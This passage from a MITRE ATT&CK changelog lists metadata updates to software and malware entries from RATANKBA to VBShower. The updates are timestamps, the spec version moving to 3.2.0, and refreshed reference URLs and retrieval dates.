modified | 2020-03-30 17:24:58.616000+00:00 | 2025-04-16 20:38:21.673000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0241] RATANKBA
Current version: 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2020-09-02 18:46:32.365000+00:00 | 2025-04-16 20:38:26.215000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0495] RDAT
Current version: 1.0
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2020-10-15 23:59:45.815000+00:00 | 2025-04-16 20:38:05.635000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0416] RDFSNIFFER
Current version: 1.0
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2019-10-16 15:34:22.990000+00:00 | 2025-04-16 20:37:52.986000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0496] REvil
Current version: 2.2
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-04-11 00:15:32.724000+00:00 | 2024-11-17 23:08:38.543000+00:00 |
external_references[14]['description'] | Tetra Defense. (2020, March). CAUSE AND EFFECT: SODINOKIBI RANSOMWARE ANALYSIS. Retrieved December 14, 2020. | Tetra Defense. (2020, March). CAUSE AND EFFECT: SODINOKIBI RANSOMWARE ANALYSIS. Retrieved November 17, 2024. |
external_references[14]['url'] | https://www.tetradefense.com/incident-response-services/cause-and-effect-sodinokibi-ransomware-analysis | https://web.archive.org/web/20210414101816/https://tetradefense.com/incident-response-services/cause-and-effect-sodinokibi-ransomware-analysis/ |
[S0258] RGDoor
Current version: 1.2
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2021-09-10 18:59:39.228000+00:00 | 2025-04-16 20:38:32.672000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0003] RIPTIDE
Current version: 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2020-03-30 17:28:04.217000+00:00 | 2025-04-16 20:38:30.044000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0112] ROCKBOOT
Current version: 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2021-02-09 15:16:26.188000+00:00 | 2025-04-16 20:38:35.715000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0240] ROKRAT
Current version: 2.3
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2022-03-30 20:40:21.212000+00:00 | 2025-04-16 20:38:12.531000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0148] RTM
Current version: 1.2
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2022-07-29 19:51:00.660000+00:00 | 2025-04-16 20:38:23.633000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0481] Ragnar Locker
Current version: 1.2
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-09-06 15:08:53.375000+00:00 | 2025-04-16 20:38:08.233000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[S0458] Ramsay
Current version: 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2021-04-14 22:10:12.150000+00:00 | 2025-04-16 20:38:32.837000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0364] RawDisk
Current version: 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-08-14 15:22:38.134000+00:00 | 2024-11-17 19:51:16.652000+00:00 |
external_references[2]['description'] | Novetta Threat Research Group. (2016, February 24). Operation Blockbuster: Destructive Malware Report. Retrieved March 2, 2016. | Novetta Threat Research Group. (2016, February 24). Operation Blockbuster: Destructive Malware Report. Retrieved November 17, 2024. |
external_references[2]['url'] | https://web.archive.org/web/20160303200515/https://operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Destructive-Malware-Report.pdf | https://web.archive.org/web/20160303200515/https:/operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Destructive-Malware-Report.pdf |
[S0169] RawPOS
Current version: 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2020-03-30 03:01:39.526000+00:00 | 2025-04-16 20:38:24.883000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0075] Reg
Current version: 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2022-10-13 20:23:35.333000+00:00 | 2025-04-16 20:38:56.474000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0511] RegDuke
Current version: 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-03-24 21:24:58.468000+00:00 | 2025-04-16 20:38:04.977000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[S0332] Remcos
Current version: 1.3
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2022-12-23 14:07:20.658000+00:00 | 2025-04-16 20:38:53.082000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[S0166] RemoteCMD
Current version: 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2020-03-31 12:40:01.208000+00:00 | 2025-04-16 20:38:06.578000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0592] RemoteUtilities
Current version: 1.0
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2021-04-25 23:30:38.375000+00:00 | 2025-04-16 20:38:49.636000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0174] Responder
Current version: 1.2
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-03-17 14:01:57.617000+00:00 | 2025-04-16 20:38:54.639000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[S0379] Revenge RAT
Current version: 1.2
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-10-02 23:04:26.238000+00:00 | 2024-11-17 23:54:41.761000+00:00 |
external_references[1]['description'] | Gannon, M. (2019, February 11). With Upgrades in Delivery and Support Infrastructure, Revenge RAT Malware is a Bigger Threat. Retrieved May 1, 2019. | Gannon, M. (2019, February 11). With Upgrades in Delivery and Support Infrastructure, Revenge RAT Malware is a Bigger Threat. Retrieved November 17, 2024. |
external_references[1]['url'] | https://cofense.com/upgrades-delivery-support-infrastructure-revenge-rat-malware-bigger-threat/ | https://web.archive.org/web/20200428173819/https://cofense.com/upgrades-delivery-support-infrastructure-revenge-rat-malware-bigger-threat/ |
[S0400] RobbinHood
Current version: 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2020-03-30 18:05:52.348000+00:00 | 2025-04-16 20:37:54.940000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0270] RogueRobin
Current version: 2.2
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-03-22 05:24:35.812000+00:00 | 2025-04-16 20:38:22.307000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[S0090] Rover
Current version: 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2020-03-17 14:52:20.206000+00:00 | 2025-04-16 20:38:15.344000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S1071] Rubeus
Current version: 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-08-03 18:30:05.885000+00:00 | 2025-04-16 20:38:56.949000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[S0358] Ruler
Current version: 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-10-14 22:11:30.271000+00:00 | 2025-04-16 20:38:53.872000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0253] RunningRAT
Current version: 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2020-04-21 23:09:31.043000+00:00 | 2025-04-16 20:38:12.728000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0446] Ryuk
Current version: 1.4
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-08-09 18:11:35.634000+00:00 | 2025-04-16 20:38:27.373000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[S0085] S-Type
Current version: 1.3
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-03-10 16:02:05.568000+00:00 | 2025-04-16 20:38:13.738000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[S0461] SDBbot
Current version: 2.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2022-07-18 16:01:14.539000+00:00 | 2025-04-16 20:38:23.446000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0195] SDelete
Current version: 1.2
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2020-08-12 21:37:53.804000+00:00 | 2025-04-16 20:38:56.799000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0185] SEASHARPEE
Current version: 2.0
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2021-04-23 20:29:59.216000+00:00 | 2025-04-16 20:37:54.263000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0450] SHARPSTATS
Current version: 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-03-22 05:29:42.303000+00:00 | 2025-04-16 20:38:17.168000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[S0028] SHIPSHAPE
Current version: 1.0
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_aliases | | ['SHIPSHAPE'] |
x_mitre_deprecated | | False |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2018-10-17 00:14:20.652000+00:00 | 2024-11-17 15:05:25.108000+00:00 |
external_references[1]['description'] | FireEye Labs. (2015, April). APT30 AND THE MECHANICS OF A LONG-RUNNING CYBER ESPIONAGE OPERATION. Retrieved May 1, 2015. | FireEye Labs. (2015, April). APT30 AND THE MECHANICS OF A LONG-RUNNING CYBER ESPIONAGE OPERATION. Retrieved November 17, 2024. |
external_references[1]['url'] | https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf | https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2015/05/20081935/rpt-apt30.pdf |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0063] SHOTPUT
Current version: 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2020-03-30 18:09:41.437000+00:00 | 2025-04-16 20:38:09.918000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0217] SHUTTERSPEED
Current version: 1.0
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-09-04 21:36:27.669000+00:00 | 2024-11-17 15:01:33.388000+00:00 |
external_references[1]['description'] | FireEye. (2018, February 20). APT37 (Reaper): The Overlooked North Korean Actor. Retrieved March 1, 2018. | FireEye. (2018, February 20). APT37 (Reaper): The Overlooked North Korean Actor. Retrieved November 17, 2024. |
external_references[1]['url'] | https://www2.fireeye.com/rs/848-DID-242/images/rpt_APT37.pdf | https://services.google.com/fh/files/misc/apt37-reaper-the-overlooked-north-korean-actor.pdf |
[S0218] SLOWDRIFT
Current version: 1.1
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_deprecated | | False |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2020-03-30 18:10:33.691000+00:00 | 2024-11-17 15:01:33.387000+00:00 |
external_references[2]['description'] | FireEye. (2018, February 20). APT37 (Reaper): The Overlooked North Korean Actor. Retrieved March 1, 2018. | FireEye. (2018, February 20). APT37 (Reaper): The Overlooked North Korean Actor. Retrieved November 17, 2024. |
external_references[2]['url'] | https://www2.fireeye.com/rs/848-DID-242/images/rpt_APT37.pdf | https://services.google.com/fh/files/misc/apt37-reaper-the-overlooked-north-korean-actor.pdf |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0649] SMOKEDHAM
Current version: 1.2
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-04-14 23:43:40.206000+00:00 | 2025-04-16 20:38:19.381000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[S0159] SNUGRIDE
Current version: 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2020-03-30 18:11:04.830000+00:00 | 2025-04-16 20:38:01.282000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0157] SOUNDBITE
Current version: 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2020-03-30 18:11:45.403000+00:00 | 2025-04-16 20:38:26.524000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0035] SPACESHIP
Current version: 1.1
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_deprecated | | False |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2020-03-30 03:05:20.517000+00:00 | 2024-11-17 15:05:25.107000+00:00 |
external_references[1]['description'] | FireEye Labs. (2015, April). APT30 AND THE MECHANICS OF A LONG-RUNNING CYBER ESPIONAGE OPERATION. Retrieved May 1, 2015. | FireEye Labs. (2015, April). APT30 AND THE MECHANICS OF A LONG-RUNNING CYBER ESPIONAGE OPERATION. Retrieved November 17, 2024. |
external_references[1]['url'] | https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf | https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2015/05/20081935/rpt-apt30.pdf |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0390] SQLRat
Current version: 1.2
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-03-22 05:36:07.371000+00:00 | 2025-04-16 20:38:22.655000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[S1042] SUGARDUMP
Current version: 1.0
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2022-10-04 21:03:54.834000+00:00 | 2025-04-16 20:38:26.373000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S1049] SUGARUSH
Current version: 1.0
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2022-10-04 21:50:36.241000+00:00 | 2025-04-16 20:38:04.465000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0562] SUNSPOT
Current version: 1.2
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-03-27 20:02:20.344000+00:00 | 2025-04-16 20:38:33.634000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[S1064] SVCReady
Current version: 1.0
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-04-18 12:41:37.940000+00:00 | 2025-04-16 20:38:16.488000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[S0464] SYSCON
Current version: 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2022-10-21 15:16:57.038000+00:00 | 2025-04-16 20:38:41.948000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0053] SeaDuke
Current version: 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2021-04-26 17:40:17.009000+00:00 | 2025-04-16 20:38:13.890000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0382] ServHelper
Current version: 1.2
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-04-14 23:44:24.382000+00:00 | 2025-04-16 20:38:29.531000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[S0639] Seth-Locker
Current version: 1.0
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2021-10-13 14:17:43.705000+00:00 | 2025-04-16 20:38:44.630000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0596] ShadowPad
Current version: 1.2
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-03-26 20:09:03.093000+00:00 | 2025-04-16 20:38:41.797000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[S0140] Shamoon
Current version: 2.2
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-02-08 20:53:17.332000+00:00 | 2024-11-17 16:07:44.262000+00:00 |
external_references[4]['description'] | FireEye. (2016, November 30). FireEye Responds to Wave of Destructive Cyber Attacks in Gulf Region. Retrieved January 11, 2017. | FireEye. (2016, November 30). FireEye Responds to Wave of Destructive Cyber Attacks in Gulf Region. Retrieved November 17, 2024. |
external_references[4]['url'] | https://www.fireeye.com/blog/threat-research/2016/11/fireeye_respondsto.html | https://web.archive.org/web/20210126065851/https://www.fireeye.com/blog/threat-research/2016/11/fireeye_respondsto.html |
[S1089] SharpDisco
Current version: 1.0
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-09-26 20:19:38.859000+00:00 | 2025-04-16 20:37:57.878000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[S0546] SharpStage
Current version: 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2021-08-18 23:48:44.783000+00:00 | 2025-04-16 20:37:55.445000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0444] ShimRat
Current version: 1.0
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2020-05-29 03:39:40.754000+00:00 | 2025-04-16 20:38:09.372000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0445] ShimRatReporter
Current version: 1.0
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2020-05-27 22:39:28.701000+00:00 | 2025-04-16 20:38:50.090000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0589] Sibot
Current version: 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-03-27 19:54:34.154000+00:00 | 2025-04-16 20:38:25.040000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[S0610] SideTwist
Current version: 1.0
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2021-10-13 13:53:26.301000+00:00 | 2025-04-16 20:38:38.737000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0623] Siloscape
Current version: 1.0
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2021-10-18 13:42:10.432000+00:00 | 2025-04-16 20:38:07.079000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S1035] Small Sieve
Current version: 1.0
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2022-10-14 15:24:24.129000+00:00 | 2025-04-16 20:38:45.865000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0273] Socksbot
Current version: 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2020-03-30 18:14:59.190000+00:00 | 2025-04-16 20:38:40.498000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0627] SodaMaster
Current version: 1.0
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2021-10-11 15:50:25.945000+00:00 | 2025-04-16 20:38:24.073000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0615] SombRAT
Current version: 1.2
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2022-10-05 16:33:54.170000+00:00 | 2025-04-16 20:38:04+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0516] SoreFang
Current version: 1.0
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2020-10-06 16:10:42.422000+00:00 | 2025-04-16 20:38:40.031000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0543] Spark
Current version: 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2021-08-18 23:49:01.615000+00:00 | 2025-04-16 20:37:52.059000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0646] SpicyOmelette
Current version: 1.0
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2021-10-18 16:42:45.608000+00:00 | 2025-04-16 20:38:10.394000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0058] SslMM
Current version: 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2020-03-18 15:53:57.549000+00:00 | 2025-04-16 20:38:01.128000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0188] Starloader
Current version: 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2020-03-18 16:01:37.852000+00:00 | 2025-04-16 20:38:24.530000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0142] StreamEx
Current version: 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2020-03-30 18:15:56.762000+00:00 | 2025-04-16 20:38:22.967000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S1034] StrifeWater
Current version: 1.0
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2022-10-11 18:34:04.838000+00:00 | 2025-04-16 20:38:45.234000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0603] Stuxnet
Current version: 1.4
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-04-10 23:46:32.577000+00:00 | 2025-01-02 19:40:26.678000+00:00 |
external_references[3]['url'] | https://www.esetnod32.ru/company/viruslab/analytics/doc/Stuxnet_Under_the_Microscope.pdf | https://web-assets.esetstatic.com/wls/2012/11/Stuxnet_Under_the_Microscope.pdf |
external_references[4]['description'] | Nicolas Falliere, Liam O Murchu, Eric Chien 2011, February W32.Stuxnet Dossier (Version 1.4) Retrieved. 2017/09/22 | Nicolas Falliere, Liam O Murchu, Eric Chien 2011, February W32.Stuxnet Dossier (Version 1.4) Retrieved November 17, 2024. |
external_references[4]['url'] | https://www.wired.com/images_blogs/threatlevel/2011/02/Symantec-Stuxnet-Update-Feb-2011.pdf | https://docs.broadcom.com/doc/security-response-w32-stuxnet-dossier-11-en |
[S0018] Sykipot
Current version: 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2020-05-13 22:58:34.210000+00:00 | 2025-04-16 20:38:14.881000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0242] SynAck
Current version: 1.3
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2021-09-08 19:22:44.438000+00:00 | 2025-04-16 20:37:52.360000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0060] Sys10
Current version: 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2020-03-18 23:13:31.404000+00:00 | 2025-04-16 20:38:20.019000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0096] Systeminfo
Current version: 1.2
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-03-07 13:03:30.781000+00:00 | 2025-04-16 20:38:53.231000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[S0098] T9000
Current version: 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2020-03-31 12:40:49.213000+00:00 | 2025-04-16 20:38:20.867000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0586] TAINTEDSCRIBE
Current version: 1.0
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2021-04-26 15:52:00.433000+00:00 | 2025-04-16 20:38:19.869000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0164] TDTESS
Current version: 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2020-03-30 18:18:53.335000+00:00 | 2025-04-16 20:37:55.276000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0560] TEARDROP
Current version: 1.2
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-03-27 19:55:35.688000+00:00 | 2025-04-16 20:38:01.954000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[S0146] TEXTMATE
Current version: 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2022-07-20 20:06:44.708000+00:00 | 2025-04-16 20:38:06.918000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0436] TSCookie
Current version: 1.0
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2022-04-15 11:32:25.171000+00:00 | 2025-04-16 20:38:18.117000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0199] TURNEDUP
Current version: 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2021-02-09 15:25:33.116000+00:00 | 2025-04-16 20:38:38.086000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0467] TajMahal
Current version: 1.0
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2020-06-15 21:19:30.717000+00:00 | 2025-04-16 20:38:31.332000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S1011] Tarrask
Current version: 1.0
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2022-10-18 15:53:30.609000+00:00 | 2025-04-16 20:38:25.204000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0595] ThiefQuest
Current version: 1.2
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2022-04-16 15:01:37.957000+00:00 | 2025-04-16 20:38:16.679000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0668] TinyTurla
Current version: 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-03-26 20:20:44.580000+00:00 | 2025-04-16 20:38:00.312000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[S0004] TinyZBot
Current version: 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2022-07-22 18:37:22.180000+00:00 | 2025-04-16 20:38:33.790000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0671] Tomiris
Current version: 1.0
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2022-04-15 13:14:08.071000+00:00 | 2025-04-16 20:38:01.801000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0682] TrailBlazer
Current version: 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-03-27 19:56:40.741000+00:00 | 2025-04-16 20:38:33.457000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[S0094] Trojan.Karagany
Current version: 3.0
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2022-04-19 14:57:44.862000+00:00 | 2025-04-16 20:38:20.519000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0001] Trojan.Mebromi
Current version: 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2020-03-30 18:22:55.430000+00:00 | 2025-04-16 20:38:34.746000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0178] Truvasys
Current version: 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2020-03-18 16:10:02.987000+00:00 | 2025-04-16 20:38:14.507000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0647] Turian
Current version: 1.0
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2021-10-18 13:19:48.020000+00:00 | 2025-04-16 20:38:02.104000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0116] UACMe
Current version: 1.0
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2018-10-17 00:14:20.652000+00:00 | 2025-04-16 20:38:49.934000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0275] UPPERCUT
Current version: 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2020-03-30 18:24:27.229000+00:00 | 2025-04-16 20:38:44.933000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0452] USBferry
Current version: 1.0
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2020-06-16 15:52:25.167000+00:00 | 2025-04-16 20:38:17.950000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0221] Umbreon
Current version: 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2020-07-01 18:32:47.285000+00:00 | 2025-04-16 20:38:03.511000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0130] Unknown Logger
Current version: 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2020-03-30 18:25:14.290000+00:00 | 2025-04-16 20:38:29.897000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0442] VBShower
Current version: 1.0
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
